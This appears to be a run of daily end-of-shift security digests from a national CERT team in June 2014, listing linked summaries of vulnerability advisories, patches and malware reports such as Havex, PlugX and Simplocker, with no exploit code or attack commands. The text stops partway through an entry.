The globally distributed Akamai Intelligent Platform delivers over 2 trillion Internet interactions and defends against multiple DDoS attacks each day. This provides us with unique visibility into Internet connection speeds, broadband adoption, mobile usage, outages, and attacks. Drawing ..
---------------------------------------------
http://www.akamai.com/stateoftheinternet/
*** OpenAFS Memory Error Lets Remote Users Execute Arbitrary Code ***
---------------------------------------------
http://www.securitytracker.com/id/1030459
*** 20-year-old compression-algorithm vulnerability causes confusion ***
---------------------------------------------
A security researcher uncovered a vulnerability said to affect mainly Linux users; the authors give the all-clear.
---------------------------------------------
http://derstandard.at/2000002429137
*** Serious Android crypto key theft vulnerability affects 86% of devices ***
---------------------------------------------
Bug in Android KeyStore that leaks credentials fixed only in KitKat.
---------------------------------------------
http://arstechnica.com/security/2014/06/serious-android-crypto-key-theft-vu…
*** Anatomy of an Android SMS virus - watch out for text messages, even from your friends! ***
---------------------------------------------
Paul Ducklin looks into "Andr/SlfMite-A", an Android SMS virus. The malware sends itself to your top 20 contacts and foists a third-party app for an alternative Android software market onto your device...
---------------------------------------------
http://nakedsecurity.sophos.com/2014/06/29/anatomy-of-an-android-sms-virus-…
*** DSA-2970 cacti ***
---------------------------------------------
http://www.debian.org/security/2014/dsa-2970
*** Microsoft Kills Security Emails, Blames Canada ***
---------------------------------------------
In a move that may wind up helping spammers, Microsoft is blaming a new Canadian anti-spam law for the company's recent decision to stop sending regular emails about security updates for its Windows operating system and other Microsoft software.
---------------------------------------------
http://krebsonsecurity.com/2014/06/microsoft-kills-security-emails-blames-c…
*** ICS Focused Malware (Update A) ***
---------------------------------------------
This alert update is a follow-up to the original NCCIC/ICS-CERT Alert titled ICS-ALERT-14-176-02 ICS Focused Malware that was published June 25, 2014 on the ICS-CERT web site, and includes information previously published to the US-CERT secure portal.
---------------------------------------------
http://ics-cert.us-cert.gov/alerts/ICS-ALERT-14-176-02A
*** Disqus Wordpress Plugin Flaw Leaves Millions of Blogs Vulnerable to Hackers ***
---------------------------------------------
A remote code execution (RCE) vulnerability has been discovered in the comment and discussion service Disqus' plugin for the most popular blogging platform, WordPress. While there are more than 70 million websites on the Internet currently running WordPress, about 1.3 million of them use the 'Disqus Comment System' plugin, making it one of the most popular WordPress plugins for web comments.
---------------------------------------------
http://thehackernews.com/2014/06/disqus-wordpress-plugin-flaw-leaves.html
*** VLC media player has a critical crypto vulnerability ***
---------------------------------------------
A vulnerability in GnuTLS can apparently also be fatal for VLC users: if the media player tries to open a stream from a specially prepared server, infection with malicious code looms.
---------------------------------------------
http://www.heise.de/security/meldung/Medienplayer-VLC-mit-kritischer-Krypto…
*** Analysis: Spam in May 2014 ***
---------------------------------------------
In the run-up to the summer, spammers offered their potential customers seedlings and seeds for gardening. In addition, English-language festive spam in May was dedicated to Mother's Day - the attackers sent out adverts offering flowers and candies.
---------------------------------------------
http://www.securelist.com/en/analysis/204792339/Spam_in_May_2014
*** How to protect yourself against privileged user abuse ***
---------------------------------------------
Network World - The typical organization loses 5% of its revenues to fraud by its own employees each year, with most thefts committed by trusted employees in executive management, operations, accounting, sales, customer service or purchasing, ..
---------------------------------------------
http://www.computerworld.com/s/article/9249440/How_to_protect_yourself_agai…
*** Google too closes data leak in cloud storage ***
---------------------------------------------
Anyone who clicks on links in documents stored on Google Drive leaves data traces. Through these, third parties can access the documents.
---------------------------------------------
http://www.heise.de/security/meldung/Auch-Google-schliesst-Datenleck-im-Clo…
=======================
= End-of-Shift report =
=======================
Timeframe: Donnerstag 26-06-2014 18:00 − Freitag 27-06-2014 18:00
Handler: Robert Waldner
Co-Handler: Stephan Richter
*** Stuxnet-like Havex Malware Strikes European SCADA Systems ***
---------------------------------------------
Security researchers have uncovered a new Stuxnet-like malware, named "Havex", which was used in a number of previous cyber attacks against organizations in the energy sector. Just like the famous Stuxnet worm, which was specially designed to sabotage the Iranian nuclear project, the new trojan Havex is also programmed to infect industrial control system software of SCADA and ICS systems,...
---------------------------------------------
http://thehackernews.com/2014/06/stuxnet-like-havex-malware-strikes.html
*** Integer overflow: vulnerability in the LZ4 and LZO compression algorithms ***
---------------------------------------------
A vulnerability has been discovered in the code of the widely used compression algorithms LZO and LZ4. It affects numerous applications, including the Linux kernel, the multimedia libraries FFmpeg and Libav, and OpenVPN.
---------------------------------------------
http://www.golem.de/news/integer-overflow-sicherheitsluecke-in-kompressions…
*** Image Stock Spam Reemerges ***
---------------------------------------------
Image stock spam, which can affect share prices and cause financial loss, has become more prominent in the last week. Image spam has been around for a long time and peaked in January 2007, when Symantec estimated that image spam accounted for nearly 52 percent of all spam. Pump-and-dump image stock spam made up a significant portion of that 52 percent.
---------------------------------------------
http://www.symantec.com/connect/blogs/image-stock-spam-reemerges
*** 1st International Conference on Information Systems Security and Privacy - ICISSP 2015 ***
---------------------------------------------
Venue: ESEO, Angers, Loire Valley, France
Event date: 9 - 11 February, 2015
Scope: The International Conference on Information Systems Security and Privacy aims at creating a meeting point of researchers and practitioners that address security and privacy challenges that concern information systems, especially in organizations, including not only technological issues but also social issues.
---------------------------------------------
http://www.securityfocus.com/archive/1/532572
*** New PHP versions patch security vulnerabilities ***
---------------------------------------------
PHP 5.4.30 and 5.5.14 each close a sizeable number of security vulnerabilities; the developers recommend a prompt upgrade.
---------------------------------------------
http://www.heise.de/security/meldung/Neue-PHP-Versionen-verarzten-Sicherhei…
*** Thomson TWG87OUIR Cross Site Request Forgery ***
---------------------------------------------
Topic: Thomson TWG87OUIR Cross Site Request Forgery
Risk: Medium
Text:
#Author: nopesled
#Date: 24/06/14
#Vulnerability: POST Password Reset CSRF
#Tested on: Thomson TWG87OUIR (Hardware Version) ...
---------------------------------------------
http://cxsecurity.com/issue/WLB-2014060148
*** Bugtraq: [RT-SA-2014-008] Python CGIHTTPServer File Disclosure and Potential Code Execution ***
---------------------------------------------
http://www.securityfocus.com/archive/1/532571
*** Security Notice-Statement About the Impact of the Dual_EC_DRBG Vulnerability on Huawei Devices ***
---------------------------------------------
Jun 27, 2014 17:39
---------------------------------------------
http://www.huawei.com/en/security/psirt/security-bulletins/security-notices…
*** Vuln: LZ4 lz4.c Memory Corruption Vulnerability ***
---------------------------------------------
LZ4 lz4.c Memory Corruption Vulnerability
---------------------------------------------
http://www.securityfocus.com/bid/68218
=======================
= End-of-Shift report =
=======================
Timeframe: Mittwoch 25-06-2014 18:00 − Donnerstag 26-06-2014 18:00
Handler: Stephan Richter
Co-Handler: Robert Waldner
*** Symantec Data Insight Management Console HTML Injection and Cross-Site Scripting ***
---------------------------------------------
The management console for Symantec Data Insight does not sufficiently validate/sanitize arbitrary input in two separate fields within the management GUI. This could potentially allow unauthorized command execution or potential malicious redirection.
---------------------------------------------
http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=se…
*** VMware Patches Apache Struts Flaws in vCOPS ***
---------------------------------------------
VMware has patched several serious security vulnerabilities in its vCenter Operations Center Management suite, one of which could lead to remote code execution on vulnerable machines.
---------------------------------------------
http://threatpost.com/vmware-patches-apache-struts-flaws-in-vcops/106858
*** phpMyAdmin 4.2.3 XSS ***
---------------------------------------------
Multiple cross-site scripting (XSS) vulnerabilities in phpMyAdmin 4.1.x before 4.1.14.1 and 4.2.x before 4.2.4 allow remote authenticated users to inject arbitrary web script or HTML via a crafted table name that is improperly handled after a hide or unhide action.
---------------------------------------------
http://cxsecurity.com/issue/WLB-2014060139
*** Sophos Anti-Virus Input Validation Flaw in Configuration Console Permits Cross-Site Scripting Attacks ***
---------------------------------------------
A vulnerability was reported in the Sophos Anti-Virus Configuration Console. A remote user can conduct cross-site scripting attacks.
Several scripts do not properly filter HTML code from user-supplied input before displaying the input. A remote user can cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the Sophos Anti-Virus configuration console software and will run in the security context of that site.
---------------------------------------------
http://www.securitytracker.com/id/1030467
*** IBM Security Bulletin: Potential Security Vulnerabilities fixed in IBM WebSphere Application Server 7.0.0.33 ***
---------------------------------------------
Cross reference list for security vulnerabilities fixed in IBM WebSphere Application Server 7.0.0.33 and IBM WebSphere Application Server Hypervisor Edition 7.0.0.33
CVE(s): CVE-2013-6323, CVE-2013-6329, CVE-2013-6349, CVE-2013-6738, CVE-2014-0859, CVE-2013-6438, CVE-2013-6747, CVE-2014-3022, CVE-2014-0891, CVE-2014-0965, CVE-2014-0050, CVE-2014-0098, CVE-2014-0963 and CVE-2014-0114
Affected product(s) and affected version(s): WebSphere Application Server and bundling
---------------------------------------------
https://www-304.ibm.com/connections/blogs/PSIRT/entry/ibm_security_bulletin…
*** IBM Security Bulletin: Potential Security Vulnerabilities fixed in IBM WebSphere Application Server 8.0.0.9 ***
---------------------------------------------
Cross reference list for security vulnerabilities fixed in IBM WebSphere Application Server 8.0.0.9 and IBM WebSphere Application Server Hypervisor 8.0.0.9
CVE(s): CVE-2013-6323, CVE-2013-6329, CVE-2013-6349, CVE-2014-0823, CVE-2013-6738, CVE-2014-0857, CVE-2014-0859, CVE-2013-6438, CVE-2013-6747, CVE-2014-3022, CVE-2014-0891, CVE-2014-0965, CVE-2014-0050, CVE-2014-0098, CVE-2014-0963 and CVE-2014-0076
Affected product(s) and affected version(s): WebSphere Application Server and bundling
---------------------------------------------
https://www-304.ibm.com/connections/blogs/PSIRT/entry/ibm_security_bulletin…
*** IBM Security Bulletin: Rational ClearQuest is affected by the following OpenSSL vulnerabilities: CVE-2014-0224, CVE-2014-3470 ***
---------------------------------------------
Security vulnerabilities have been discovered in OpenSSL that were reported on June 5, 2014 by the OpenSSL Project. The OpenSSL component is shipped as embedded in cqperl. Customers might be affected when there are Perl hooks or scripts that use SSL connections. ClearQuest itself does not provide any service using OpenSSL.
CVE(s): CVE-2014-0224 and CVE-2014-3470
---------------------------------------------
https://www-304.ibm.com/connections/blogs/PSIRT/entry/ibm_security_bulletin…
*** PayPal 2FA mobe flaw chills warm and fuzzy security feeling ***
---------------------------------------------
PayPal's second factor authentication (2FA) protection can be mitigated through mobile device interfaces that allow fraudsters to steal funds with a victim's username and password, Duo Security researchers say.
---------------------------------------------
http://go.theregister.com/feed/www.theregister.co.uk/2014/06/26/paypal_2fa_…
*** Multiple Cross Site Scripting in Sophos Antivirus Configuration Console (Linux) ***
---------------------------------------------
The Configuration Console of Sophos Antivirus 9.5.1 (Linux) does not sanitize several input parameters before sending them back to the browser, so an attacker could inject code inside these parameters, including JavaScript code. ... CVE: CVE-2014-2385
Affected version: 9.5.1
Fixed version: 9.6.1
---------------------------------------------
https://www.portcullis-security.com/security-research-and-downloads/securit…
*** Fewer NTP servers exploitable for DDoS, but... ***
---------------------------------------------
Some of the still-vulnerable time servers, however, are so badly configured that devastating NTP amplification attacks remain possible.
---------------------------------------------
http://www.heise.de/newsticker/meldung/Weniger-NTP-Server-fuer-dDoS-ausnutz…
*** Fighting cybercrime: Strategic cooperation agreement signed between ENISA and Europol ***
---------------------------------------------
The heads of ENISA and Europol today signed a strategic cooperation agreement in Europol's headquarters in The Hague, to facilitate closer cooperation and exchange of expertise in the fight against cybercrime.
---------------------------------------------
http://www.enisa.europa.eu/media/press-releases/fighting-cybercrime-strateg…
*** 2014 Cyber Attacks Timeline Master Index (at least so far) ***
---------------------------------------------
Finally I was able to organize the timelines collected in 2014. I have created a new page with the 2014 Cyber Attacks Timeline Master Index accessible either directly or from the link in the top menu bar. Hopefully it will be regularly updated. With this opportunity I also re-ordered the timelines and stats for 2013. Now everything should be more structured.
---------------------------------------------
http://hackmageddon.com/2014/06/24/2014-cyber-attacks-timeline-master-index…
*** Update to Microsoft Update client ***
---------------------------------------------
This article describes the update that further improves the security of Windows Update (WU) / Microsoft Update (MU) client for Windows 8, Windows RT, Windows Server 2012, Windows 7 Service Pack 1 (SP1), and Windows Server 2008 R2 SP1. Note: Windows 8.1, Windows RT 8.1, and Windows Server 2012 R2 with update 2919355 already include these improvements.
---------------------------------------------
http://support.microsoft.com/kb/2887535
*** Hacking Blind (PDF) ***
---------------------------------------------
Abstract: We show that it is possible to write remote stack buffer overflow exploits without possessing a copy of the target binary or source code, against services that restart after a crash. This makes it possible to hack proprietary closed-binary services, or open-source servers manually compiled and installed from source where the binary remains unknown to the attacker.
---------------------------------------------
http://www.exploit-db.com/download_pdf/33872
=======================
= End-of-Shift report =
=======================
Timeframe: Dienstag 24-06-2014 18:00 − Mittwoch 25-06-2014 18:00
Handler: Stephan Richter
Co-Handler: n/a
*** TimThumb WebShot Code Execution Exploit (0-day) ***
---------------------------------------------
If you are still using Timthumb after the serious vulnerability that was found on it last year, you have one more reason to be concerned. A new 0-day was just disclosed on TimThumb's "Webshot" feature that allows for certain commands to be executed on the vulnerable website remotely (no authentication required). With a simple command,...
---------------------------------------------
http://blog.sucuri.net/2014/06/timthumb-webshot-code-execution-exploit-0-da…
*** SPAM Hack Targets WordPress Core Install Directories ***
---------------------------------------------
Do you run your website on WordPress? Have you checked the integrity of your core install lately for SPAM like "Google Pharmacy" stores or other fake stores? We have been tracking and analyzing a growing trend in SEO Spam (a.k.a., Search Engine Poisoning (SEP)) attacks in which thousands of compromised WordPress websites are being used...
---------------------------------------------
http://blog.sucuri.net/2014/06/spam-hack-targets-wordpress-core-install-dir…
*** Asprox botnet campaign shifts tactics, evades detection ***
---------------------------------------------
FireEye researchers are tracking spikes in malicious emails attributed to an ongoing Asprox campaign.
---------------------------------------------
http://www.scmagazine.com/asprox-botnet-campaign-shifts-tactics-evades-dete…
*** R2DR2: ANALYSIS AND EXPLOITATION OF UDP AMPLIFICATION VULNERABILITIES ***
---------------------------------------------
Since we began our Master's degree in ICT security at the European University, we were drawn to the possibility of doing a project under the guidance of Alejandro Ramos (@aramosf), a professional of the scene whom we admire. After several ideas and proposals by both parties, we decided to make a project about finding new attack vectors on distributed reflection denial of service attacks (DRDoS). Recently this blog talked about it in an article focused on an SNMP vulnerability,...
---------------------------------------------
http://www.securitybydefault.com/2014/06/r2dr2-analysis-and-exploitation-of…
*** PlugX RAT With "Time Bomb" Abuses Dropbox for Command-and-Control Settings ***
---------------------------------------------
Monitoring network traffic is one of the means for IT administrators to determine if there is an ongoing targeted attack in the network. Remote access tools or RATs, commonly seen in targeted attack campaigns, are employed to establish command-and-control (C&C) communications. Although the network traffic of these RATs, such as Gh0st, PoisonIvy, Hupigon, and PlugX, among...
---------------------------------------------
http://feeds.trendmicro.com/~r/Anti-MalwareBlog/~3/4SyyRxr49gU/
*** HackPorts - Mac OS X Penetration Testing Framework and Tools ***
---------------------------------------------
HackPorts was developed as a penetration testing framework with accompanying tools and exploits that run natively on Mac platforms. HackPorts is a "super-project" that leverages existing code porting efforts; security professionals can now use hundreds of penetration tools on Mac systems without the need for Virtual Machines.
---------------------------------------------
http://hack-tools.blackploit.com/2014/06/hackports-mac-os-x-penetration-tes…
*** Flaw Lets Attackers Bypass PayPal Two-Factor Authentication ***
---------------------------------------------
There's a vulnerability in the way that PayPal handles certain requests from mobile clients that can allow an attacker to bypass the two-factor authentication mechanism for the service and transfer money from a victim's account to any recipient he chooses. The flaw lies in the way that the PayPal authentication flow works with the service's...
---------------------------------------------
http://threatpost.com/flaw-lets-attackers-bypass-paypal-two-factor-authenti…
*** ZyXEL P660RT2 EE rpAuth_1 cross-site scripting ***
---------------------------------------------
http://xforce.iss.net/xforce/xfdb/93924
*** [papers] - Searching SHODAN For Fun And Profit ***
---------------------------------------------
http://www.exploit-db.com/download_pdf/33859
*** Cisco IOS Software IPsec Denial of Service Vulnerability ***
---------------------------------------------
CVE-2014-3299
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014…
*** GnuPG data packets denial of service ***
---------------------------------------------
http://xforce.iss.net/xforce/xfdb/93935
*** VMSA-2014-0006.3 ***
---------------------------------------------
VMware product updates address OpenSSL security vulnerabilities
---------------------------------------------
http://www.vmware.com/security/advisories/VMSA-2014-0006.html
*** VMSA-2014-0007 ***
---------------------------------------------
VMware product updates address security vulnerabilities in Apache Struts library
---------------------------------------------
http://www.vmware.com/security/advisories/VMSA-2014-0007.html
*** TimThumb 2.8.13 Remote Code Execution ***
---------------------------------------------
http://cxsecurity.com/issue/WLB-2014060134
*** Bugtraq: [security bulletin] HPSBMU03053 rev.1 - HP Software Database and Middleware Automation, OpenSSL Vulnerability, Remote Unauthorized Access or Disclosure of Information ***
---------------------------------------------
http://www.securityfocus.com/archive/1/532541
=======================
= End-of-Shift report =
=======================
Timeframe: Montag 23-06-2014 18:00 − Dienstag 24-06-2014 18:00
Handler: Robert Waldner
Co-Handler: n/a
*** Stop running this script? notification redirects to Angler Exploit Kit ***
---------------------------------------------
ESET researchers identified a website serving up a Stop running this script? notification that, when clicked, redirects Internet Explorer users to the Angler Exploit Kit.
---------------------------------------------
http://www.scmagazine.com/stop-running-this-script-notification-redirects-t…
*** Android KeyStore::getKeyForName buffer overflow ***
---------------------------------------------
Google Android is vulnerable to a stack-based buffer overflow, caused by improper bounds checking by the KeyStore::getKeyForName method. By sending an overly long string, a remote attacker could overflow a buffer and execute arbitrary code on the system under the keystore process.
...
Remedy:
Upgrade to the latest version of Android (4.4 or later), available from the Google Web site. See References.
---------------------------------------------
http://xforce.iss.net/xforce/xfdb/93916
*** Havex Hunts for ICS/SCADA Systems ***
---------------------------------------------
During the past year, we've been keeping a close eye on the Havex malware family and the group behind it. Havex is known to be used in targeted attacks against different industry sectors, and it was earlier reported to have specific interest in the energy sector. The main components of Havex are a general purpose Remote Access Trojan (RAT) and a server written in PHP.
---------------------------------------------
http://www.f-secure.com/weblog/archives/00002718.html
*** Beware of Skype Adware ***
---------------------------------------------
During our daily log analysis, we recently encountered a sample purporting to power up Skype with different emoticons. The binary, when installed, integrated itself with Skype and sent the following message to contacts without further intervention.
---------------------------------------------
http://research.zscaler.com/2014/06/beware-of-skype-adware.html
*** Dramatic Drop in Vulnerable NTP Servers Used in DDoS Attacks ***
---------------------------------------------
95 percent of vulnerable NTP servers leveraged in massive DDoS attacks earlier this year have been patched, but the remaining servers still have experts concerned.
---------------------------------------------
http://threatpost.com/dramatic-drop-in-vulnerable-ntp-servers-used-in-ddos-…
=======================
= End-of-Shift report =
=======================
Timeframe: Freitag 20-06-2014 18:00 − Montag 23-06-2014 18:00
Handler: Robert Waldner
Co-Handler: n/a
*** IBM Security Bulletin: IBM Security Proventia Network Enterprise Scanner is affected by the following OpenSSL vulnerabilities ***
---------------------------------------------
Security vulnerabilities have been discovered in OpenSSL that were reported on June 5, 2014 by the OpenSSL Project.
CVE(s): CVE-2014-0224, CVE-2014-0221, CVE-2014-0195, CVE-2014-0198, CVE-2010-5298 and CVE-2014-3470
Affected product(s) and affected version(s):
Products: IBM Security Enterprise Scanner
Versions: 2.3
---------------------------------------------
https://www-304.ibm.com/connections/blogs/PSIRT/entry/ibm_security_bulletin…
*** WordPress 3.9.1 CSRF vulnerability ***
---------------------------------------------
This is the new version released by WordPress.
The version is 3.9.1 (latest).
A cross-site request forgery (CSRF) vulnerability is present in this version at the URL shown:
http://localhost/wordpress/wp-comments-post.php
---------------------------------------------
http://cxsecurity.com/issue/WLB-2014060119
*** cups-filters 1.0.52 execute arbitrary commands ***
---------------------------------------------
Topic: cups-filters 1.0.52 execute arbitrary commands
Risk: High
Text: The generate_local_queue function in utils/cups-browsed.c in cups-browsed in cups-filters before 1.0.53 allows remote IPP print...
---------------------------------------------
http://cxsecurity.com/issue/WLB-2014060124
*** [SECURITY] [DSA 2966-1] samba security update ***
---------------------------------------------
Multiple vulnerabilities were discovered and fixed in Samba, an SMB/CIFS file, print, and login server:
CVE-2014-0178: Information leak vulnerability in the VFS code.
CVE-2014-0244: Denial of service (infinite CPU loop) in the nmbd.
CVE-2014-3493: Denial of service (daemon crash) in the smbd.
---------------------------------------------
https://lists.debian.org/debian-security-announce/2014/msg00147.html
*** Security Bulletin: IBM Security Access Manager for Mobile and IBM Security Access Manager for Web appliances - LMI Authentication Bypass ***
---------------------------------------------
IBM Security Access Manager for Mobile / IBM Security Access Manager for Web fails to properly handle certain input data such that it could be possible for an attacker to authenticate to the appliance Local Management Interface using invalid authentication data.
CVE: CVE-2014-3053
CVSS Base Score: 8.0
---------------------------------------------
http://www-01.ibm.com/support/docview.wss?uid=swg21676700
*** A peek inside a commercially available Android-based botnet for hire ***
---------------------------------------------
Relying on the systematic release of DIY (do-it-yourself) mobile malware generating tools, commercial availability of mobile malware releases intersecting with the efficient exploitation of legitimate Web sites through fraudulent underground traffic exchanges, as well as the utilization of cybercrime-friendly affiliate based revenue sharing schemes, cybercriminals continue capitalizing on the ever-growing Android mobile market segment for the purpose of achieving a positive ROI ...
---------------------------------------------
http://feedproxy.google.com/~r/WebrootThreatBlog/~3/m9Fm5dNY9bg/
=======================
= End-of-Shift report =
=======================
Timeframe: Mittwoch 18-06-2014 18:00 − Freitag 20-06-2014 18:00
Handler: Robert Waldner
Co-Handler: n/a
*** SA-CONTRIB-2014-062 - Password Policy - Multiple vulnerabilities ***
---------------------------------------------
Advisory ID: DRUPAL-SA-CONTRIB-2014-062
Project: Password policy (third-party module)
Version: 6.x, 7.x
Date: 2014-June-18
Security risk: Moderately critical
Exploitable from: Remote
Vulnerability: Multiple vulnerabilities
Description: The Password Policy module enables you to define and enforce password policies with various constraints on allowable user passwords.
Access bypass and information disclosure (7.x only)
---------------------------------------------
https://drupal.org/node/2288341
*** KDE: Bug in Kmail enables man-in-the-middle attacks ***
---------------------------------------------
The code of the POP3 kioslave in KDE's e-mail application Kmail, or rather in Kdelibs, contains a bug that causes invalid certificates to be accepted without prompting. Attackers could use this to insert themselves into encrypted e-mail traffic.
---------------------------------------------
http://www.golem.de/news/kde-fehler-in-kmail-erlaubt-man-in-the-middle-angr…
*** Cisco WebEx Meeting Server Sensitive Information Disclosure Vulnerability ***
---------------------------------------------
A vulnerability in the XML programmatic interface (XML PI) of Cisco WebEx Meeting Server could allow an authenticated, remote attacker to access sensitive information.
The vulnerability is due to disclosure of the meeting information. An attacker could exploit this vulnerability by sending a crafted URL request to a vulnerable device.
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014…
*** Thousands of Android apps leak secret keys ***
---------------------------------------------
Many Android programs embed secret access keys directly in their source code. An attacker can use these to steal private data of the app's users and, in the worst case, take over the developers' server infrastructure.
---------------------------------------------
http://www.heise.de/security/meldung/Tausende-Android-Apps-geben-geheime-Sc…
*** Android 4.4.4 is rolling out to devices; contains OpenSSL fix ***
---------------------------------------------
Official change log lists "security fixes;" Googler says it is OpenSSL related.
---------------------------------------------
http://feeds.arstechnica.com/~r/arstechnica/security/~3/rMSXTBPBcjU/
*** 'Your fault - core dumped' - Diving into the BSOD caused by Rovnix ***
---------------------------------------------
Recently we have noticed some Win32/Rovnix samples (detected as TrojanDropper:Win32/Rovnix.K) causing the BSOD on Windows 7 machines. We spent some time investigating this situation and discovered an interesting story behind the BSOD. Analyzing the crash dump We first saw TrojanDropper:Win32/Rovnix.K in October 2013. During a normal Windows Boot the malware will cause the BSOD.
---------------------------------------------
http://blogs.technet.com/b/mmpc/archive/2014/06/18/your-fault-core-dumped-d…
*** Linux Kernel PI Futex Requeuing Bug Lets Local Users Gain Elevated Privileges ***
---------------------------------------------
A vulnerability was reported in the Linux Kernel. A local user can obtain elevated privileges on the target system.
A local user can exploit a flaw in the requeuing of Priority Inheritance (PI) to PI futexes to gain elevated privileges on the target system.
---------------------------------------------
http://www.securitytracker.com/id/1030451
*** Yet Another BMC Vulnerability (And some added extras) ***
---------------------------------------------
After considering the matter for the past 6 months while continuing to work with Supermicro on the issues, I have decided to release the following to everyone. On 11/7/2013, after reading a couple articles on the problems in IPMI by Rapid7's HD Moore (linked at the end), I discovered that Supermicro had created the password file PSBlock in plain text and left it open to the world on port 49152.
---------------------------------------------
http://blog.cari.net/carisirt-yet-another-bmc-vulnerability-and-some-added-…
*** Simplocker ransomware: New variants spread by Android downloader apps ***
---------------------------------------------
Since our initial discovery of Android/Simplocker we have observed several different variants. The differences between them are mostly in: Tor usage - some use a Tor .onion domain, whereas others use a more conventional C&C domain. Different ways of receiving the 'decrypt' command, indicating that the ransom has been paid. ...
---------------------------------------------
http://www.welivesecurity.com/2014/06/19/simplocker-new-variants/
*** Pen Testing Payment Terminals - A Step by Step How-to Guide ***
---------------------------------------------
There is a plenitude of payment terminals out there and the design principles vary quite a bit. The ones I have run into in Finland appear to be tightly secured with no attack surface. At first glance, that is. These generally open only outbound connections and use SSL encryption to protect the traffic. Here, I explain why testing a simple, tightly secured payment terminal is not as simple as one might think.
---------------------------------------------
http://pen-testing.sans.org/blog/pen-testing/2014/06/12/pen-testing-payment…
=======================
= End-of-Shift report =
=======================
Timeframe: Dienstag 17-06-2014 18:00 − Mittwoch 18-06-2014 18:00
Handler: Robert Waldner
Co-Handler: n/a
*** Evernote forum breached, profile information compromised ***
---------------------------------------------
The official discussion forum of Evernote has been hacked, leaving users profile information accessible to attackers.
---------------------------------------------
http://www.scmagazine.com/evernote-forum-breached-profile-information-compr…
*** Xen Lets Local Guests Obtain Hypervisor Heap Memory Contents ***
---------------------------------------------
A vulnerability was reported in Xen. A local user can obtain potentially sensitive information from other domains.
The system does not properly control access to memory pages during memory cleanup for dying guest systems. A local user on a guest system can access information from guest or hypervisor memory, potentially including guest CPU register state and hypercall arguments.
---------------------------------------------
http://www.securitytracker.com/id/1030442
*** HP Software Executive Scorecard, Remote Execution of Code, Directory Traversal ***
---------------------------------------------
VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP Executive Scorecard. The vulnerability could be exploited remotely to allow remote code execution and directory traversal.
References:
CVE-2014-2609 (ZDI-CAN-2116, SSRT101436)
CVE-2014-2610 (ZDI-CAN-2117, SSRT101435)
CVE-2014-2611 (ZDI-CAN-2120, SSRT101431)
---------------------------------------------
http://h20565.www2.hp.com/portal/site/hpsc/template.PAGE/public/kb/docDispl…
*** OpenStack Neutron L3-agent Remote Denial of Service Vulnerability ***
---------------------------------------------
OpenStack Neutron is prone to a remote denial-of-service vulnerability. An attacker can leverage this issue to cause a denial-of-service condition, denying service to legitimate users. The following versions are vulnerable: Neutron 2013.2.3 and prior; Neutron 2014.1 and prior.
---------------------------------------------
http://www.securityfocus.com/bid/68064/discuss
*** Microsoft fixes crash-prone antivirus engine ***
---------------------------------------------
With an out-of-band update outside the Patch Tuesday cycle, Microsoft fixes a bug in the Malware Protection Engine through which malware could disable the antivirus protection.
---------------------------------------------
http://www.heise.de/newsticker/meldung/Microsoft-bessert-absturzgefaehrdete…
*** VU#774788: Belkin N150 path traversal vulnerability ***
---------------------------------------------
Belkin N150 wireless router firmware versions 1.00.07 and earlier contain a path traversal vulnerability through the built-in web interface. The webproc cgi module accepts a getpage parameter which takes an unrestricted file path as input. The web server runs with root privileges by default, allowing a malicious attacker to read any file on the system.
---------------------------------------------
http://www.kb.cert.org/vuls/id/774788
*** [remote] - Ubisoft Rayman Legends 1.2.103716 - Remote Stack Buffer Overflow Vulnerability ***
---------------------------------------------
Summary: Rayman Legends is a 2013 platform game developed by Ubisoft Montpellier and published by Ubisoft.
...
Desc: The vulnerability is caused due to a memset() boundary error in the processing of incoming data through raw socket connections on TCP port 1001, which can be exploited to cause a stack based buffer overflow by sending a long string of bytes on the second connection. Successful exploitation could allow execution of arbitrary code on the affected node.
---------------------------------------------
http://www.exploit-db.com/exploits/33804
*** Forensic tool claims to download iCloud backups without a password ***
---------------------------------------------
Elcomsoft has announced that its "Phone Password Breaker" can read authentication tokens from computers, which investigators can then use to gain access to a suspect's iCloud data. The suspect's password is said to no longer be required.
---------------------------------------------
http://www.heise.de/security/meldung/Forensik-Tool-soll-iCloud-Backups-ohne…
*** When Vulnerabilities are Exploited: the Timing of First Known Exploits for Remote Code Execution Vulnerabilities ***
---------------------------------------------
One of the questions I get asked from time to time is about the days of risk between the time that a vulnerability is disclosed and when we first see active exploitation of it; i.e. how long do organizations have to deploy the update before active attacks are going to happen? Trustworthy Computing's Security Science team published new data that helps put the timing of exploitation into perspective, in the recently released Microsoft Security Intelligence Report volume 16.
---------------------------------------------
http://blogs.technet.com/b/security/archive/2014/06/17/when-vulnerabilities…
=======================
= End-of-Shift report =
=======================
Timeframe: Montag 16-06-2014 18:00 − Dienstag 17-06-2014 18:00
Handler: Alexander Riepl
Co-Handler: Robert Waldner
*** Malicious Web-based Java applet generating tool spotted in the wild ***
---------------------------------------------
Despite the prevalence of Web based client-side exploitation tools as the cybercrime ecosystem's primary infection vector, in a series of blog posts, we've been emphasizing the emergence of managed/hosted/DIY malicious Java applet generating tools/platforms, highlighting the existence of a growing market segment relying on 'visual social engineering' vectors for the purpose of tricking end users into executing malicious/rogue/fake Java applets, ultimately joining a
---------------------------------------------
http://www.webroot.com/blog/2014/06/16/malicious-web-based-java-applet-gene…
*** Cisco ASA WebVPN Information Disclosure Vulnerability ***
---------------------------------------------
CVE ID: CVE-2014-2151
...
A vulnerability in the WebVPN portal of Cisco Adaptive Security Appliance (ASA) could allow an authenticated, remote attacker to view sensitive information from the affected system.
The vulnerability is due to improper input validation in the WebVPN portal. An attacker could exploit this vulnerability by providing a crafted JavaScript file to an authenticated WebVPN user.
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014…
*** Security Advisory-Heap Overflow Vulnerability in Huawei eSap Platform ***
---------------------------------------------
Huawei eSap software platform has four heap overflow vulnerabilities. Huawei products that have used this platform are affected. When receiving some special malformed packets, such devices access heap memory that is beyond the valid range and cause unexpected restart of the devices. If an attacker keeps sending such malformed packets, the devices will repeatedly restart, causing a denial of service (DoS) attack (Vulnerability ID: HWPSIRT-2014-0111).
Huawei has provided fixed versions.
---------------------------------------------
http://www.huawei.com/en/security/psirt/security-bulletins/security-advisor…
*** IBM AIX ntpd Query Function Lets Remote Users Conduct Amplified Denial of Service Attacks ***
---------------------------------------------
